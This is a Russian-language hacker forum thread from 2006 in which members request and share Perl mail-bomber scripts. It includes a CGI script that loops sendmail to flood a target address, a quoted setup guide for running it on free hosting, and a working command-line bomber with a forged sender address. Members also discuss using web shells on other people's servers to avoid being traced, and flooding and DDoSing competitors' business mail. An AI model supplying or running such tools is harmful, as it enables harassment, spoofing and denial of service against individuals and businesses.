Mail Bomber на перле

Discussion in 'Уязвимости Mail-сервисов' started by INFerno--, 21 Mar 2006.

  1. INFerno--

    INFerno-- New Member

    Joined:
    9 Mar 2005
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Помогите пожалуйста сделать Mail Bomber на перле скиньте скрипт и полное FAQ по установке(куда залить и в какую директорию). Буду очень благодарен.
     
    1 person likes this.
  2. Mertvii-Listopad

    Joined:
    17 Mar 2006
    Messages:
    100
    Likes Received:
    12
    Reputations:
    4
    Вот! Но тебе нужен хост с поддержкой перл а на бесплатных фунция майл вроде отключена...

    #!/usr/local/bin/perl

    $mailprog = '/usr/sbin/sendmail;#
    $mail = '';#
    $from = '';#
    $file = 'bomb.txt';#
    $col = 500;#
    if (($ENV{QVERY_STRING} eq "new") && (-e$file)){unlink($file);}#
    open (DATA, $file);#
    $num = ;#
    close (DATA); #
    if ($num eq"") {$num = 0;}#
    for ($i = 1; $i<=$col;$l++){$n = $i +$num;
    open (MAIL, "|$mailprog -t");#
    print MAIL "Content-Type: text/plain; charset = windows - 1251\n";
    print MAIL "Subject:\n";#
    print MAIL "To: $mail\n";#
    print MAIL "From: $from\n\n";#
    print MAIL "\n";
    print MAIL "\n\n";#
    close (MAIL);#

    }

    open (DATA, ">$file");#
    print DATA $num+$col;#
    close (DATA);#
    print"Content-type: text/html\n\n";#
    print"$num\n";#
    print"\n"
    #


    Зы..

    Если зальешь потом мне дашь я тоже флудить буду :)
     
    1 person likes this.
  3. INFerno--

    INFerno-- New Member

    Joined:
    9 Mar 2005
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    в какую директорию заливать и как потом запустить?
    а то я статью одну читал там говорят типа в /usr/sbin/sendmail или /usr/lib/sendmail заливать нада я пробовол ничего. короче вот кусок этой статьи:

    Пишем MailBomber на перле


    2003-01-01 00:00:00



    Все пользуются электронной почтой, конечно кто сидит в Интернете. Обычно ею пользуются все, но некоторые любят использовать электронную почту в военных целях: забомбить мыл какого-нибудь надоедливого ламера или просто над кем-нибудь поприкалываться. Обычно для этого используются уже готовые mailbomber'ы. Но сегодня я предлагаю вам координально новое решение, эта программа позволяет отправлять письма разного содержания, например:

    Здраствуй, ты читаешь сообщение №1. Можешь читать следующее :))

    Здраствуй, ты читаешь сообщение №2. Можешь читать следующее :))

    Здраствуй, ты читаешь сообщение №3. Можешь читать следующее :))

    Использование mailbomber'a, который будет работать не у тебя на компе, а на *inux сервере, который поддерживает PERL, и на нем установлена программа sendmail. Из-за того что программа расположена на серваке, а не у тебя на компе, скорость отправки писем получается не детская.

    Программа обычно находится в директориях /usr/sbin/sendmail или /usr/lib/sendmail. Для удобства ты сможешь вызывать её из своего браузера. Программа будет запускаться из http://www.host.ru/cgi-bin/bomb.cgi , где bomb.cgi - это соответственно наш бомбер. Программа должна отсылать сообщения в больших количествах. С этим есть небольшая проблема, так как на многих бесплатных хостингах стоит ограничение на время работы CGI программы, которая называется timeout. Пойдем другим путем, т.е. будем отсылать сообщения по 50 штук за раз, а потом сообщать программе, что типа 50 шук отправили, давай шли еще и т.д. без остановки. Заметь программа должна быть записана в Unix формате, в случае если ты используешь MustDie, то воспользуйся Far или CuteFTP, и не забудь поставить права доступа 755 (команда chmod 755).

    Допустим ты вабрал свою жертву, это e-mail [email protected]. Программа будет записывать номер последнего отправленного письма в отдельный файл(bomb.txt), т.е. ты можешь на время прекратить бомбежку, а потом её снова начать.

    Теперь разберем код программы.

    Сдесь и идет скпипт
    -------------------------------------------------------

    Ну вот, програмка довольно простая. Ты, наверное заметил, что каждое письмо должно заканчиваться двойным \n. Это сделано для того, чтобы программа sendmail поняла, что мы все ей сказали для отправки письма. В конце концов для твоего же удобсва выводим количество отправленных писем. Но самое приятное то, что программа почти не ест твой Internet трафик. Поставил программу работать к себе в браузер и смотришь, там все больше и больше писем. И потом всегда есть возможность остановить, а потом продолжить.

    Дополнения:

    Если хочешь подставить в письмо имя почтового клиента, то вставляй эту строку, строчка должна находиться после вывода заголовка письма, где указывается его кодировка:

    print MAIL "X-Mailer: Fucking Outgluk Express ver 1.666\n"

    А теперь бежим на хостинг с CGI - типа на hut.ru или holm.ru , а может LGG.ru
     
  4. Theseus

    Theseus Banned

    Joined:
    1 Apr 2006
    Messages:
    15
    Likes Received:
    0
    Reputations:
    -1
    На халме Cgi-bin фихня туты и слифай
    нафера.... :)
     
    #4 Theseus, 12 Apr 2006
    Last edited by a moderator: 15 Apr 2006
  5. Mertvii-Listopad

    Joined:
    17 Mar 2006
    Messages:
    100
    Likes Received:
    12
    Reputations:
    4
    А не проще ли скачать прогу к примеру фук майл бомбер и херачить ею?
     
  6. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    со своего компа не разумно флудить.
     
    1 person likes this.
  7. H0ak1N

    H0ak1N Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    25
    Likes Received:
    7
    Reputations:
    1
    По-моему куда лучше на php. (нужен хостинг с функцией sendmail и желательно не свой:)
    выложил хороший бомбер на php
    _slil.ru/22684255
     
    #7 H0ak1N, 15 Apr 2006
    Last edited: 15 Apr 2006
  8. Mertvii-Listopad

    Joined:
    17 Mar 2006
    Messages:
    100
    Likes Received:
    12
    Reputations:
    4
    Бесплатных хостингов с такой функией нет... Да и владельцы тех мыл которые я флужу НЕ ХАКЕРЫ и потому сделать моему кампу ничего не смогут:)
     
  9. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    веб-шелл достать дело 2 минут. все равно флудить с компа своего не разумно =)
     
    #9 GreenBear, 15 Apr 2006
    Last edited: 15 Apr 2006
  10. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    ДА вообще флудить не разумно (имхо)
     
  11. Mertvii-Listopad

    Joined:
    17 Mar 2006
    Messages:
    100
    Likes Received:
    12
    Reputations:
    4
    А где веб шелл достать? Достань мне плизз:) С сервака бомбить в любом случаии быстрее чем с модема под винду
     
  12. H0ak1N

    H0ak1N Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    25
    Likes Received:
    7
    Reputations:
    1
    флуд и dDOS будут всегда актуальны ;)
    Например если с нескольких хостов флудить мэилы жертвы то, можно изрядно погонять траффик - это приведёт к тому, что жертве придётся переходить на более дорогой тариф хостинга или ограничить функциональность работы с почтой из-за который он может терять клиентов. (если почта предназначена для бизнеса)...
    Представьте у фирмы связь с потенциальными клиентами через мыльный ящик а им атака в виде хлама каждый день.
     
  13. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    ИМХО лутше угнать мыло чем его флудить!
     
  14. H0ak1N

    H0ak1N Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    25
    Likes Received:
    7
    Reputations:
    1
    В зависимости от поставленно задачи.
    Если бизнес предприятия ищут клиентов через инет то, флуд и ддос - лучшая тактика. Тем более взламывать почту крупных хостинговых компаний это вам не xss на бесплатной почте. К примеру взломал почту фирмы ну, и? ... ведь её сразу восстановят.
     
  15. Mertvii-Listopad

    Joined:
    17 Mar 2006
    Messages:
    100
    Likes Received:
    12
    Reputations:
    4
    А какой смысл ломать если в папки "входищии" вряд ли можно найти что то интересно а отправлять письма от любого мыла, можно и не зная пароля от него
     
  16. H0ak1N

    H0ak1N Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    25
    Likes Received:
    7
    Reputations:
    1
    Ты вообще о чём? читай сабж.
    Чё правда? Ты думаешь ты один знаешь об этом? и прчём тут всё это!
    Я говорю про то, как с помощью флуда почтового ящика и ддос технологий сорвать фирме-конкуренту бизнес.
     
  17. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Ладно все давайте по теме харе оффтопить!
     
  18. haZard0us

    haZard0us Elder - Старейшина

    Joined:
    18 Apr 2006
    Messages:
    26
    Likes Received:
    12
    Reputations:
    5
    #!/usr/bin/perl
    # :------------------------------------------------------------------------:
    # : HATS Security Team http://security.nitro.ru :
    # : :
    # : HMailBomber [hmailbomber_0.1_priv.rar] :
    # : :---------------------------------------------: :
    # : [v 0.1 private] :
    # : :
    # : Copyright © 2005-2006 Dmitri Gavrilov :
    # : :
    # : Released under the terms & conditions of v2 of the GNU General :
    # : Public License. For details refer visit http://gnu.org :
    # : :
    # : [version 0.1] >> Первый релиз :
    # : :
    # : <info> :
    # : Программа для флуда отдельных почтовых аккаунтов :
    # : :
    # : Coded by GeW [[email protected]] :
    # : Greets to all HATS Security Team members :
    # :------------------------------------------------------------------------:
    if (@ARGV < 5) {&help;}
    $from = $ARGV[0];
    $to = $ARGV[1];
    $subj = $ARGV[2];
    $letter = $ARGV[3];
    $num = $ARGV[4];
    for ($i=0;$i<$num;$i++)
    {
    open(SM,"|/usr/sbin/sendmail -t");
    print SM "From: $from\n";
    print SM "To: $to\n";
    print SM "Subject: $subj\n";
    print SM "Content-type: text/plain\n";
    print SM "$letter";
    print SM "\n";
    close SM;
    }
    sub help
    {
    print "\n";
    print (<<"end");
    ==================================================================================
    HATS Mail Bomber [version 0.1 private]
    Coded by GeW [[email protected]]
    Greets to all HATS Security Team members
    usage: perl hmailbomber.pl <from> <to> <subject> <letter text> <number of letters>
    example: perl hmailbomber.pl [email protected] [email protected] Test Text 1000
    ==================================================================================
    end
    exit();
    }

    ---------------------------

    просто и сердито =) юзайте...
     
    2 people like this.
  19. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
    А я лично писал бы на си ))
     
  20. Achtung!

    Achtung! Banned

    Joined:
    20 Mar 2006
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -1
    2haZard0us средито конечно, но код не универсален, куда удобнее через сокеты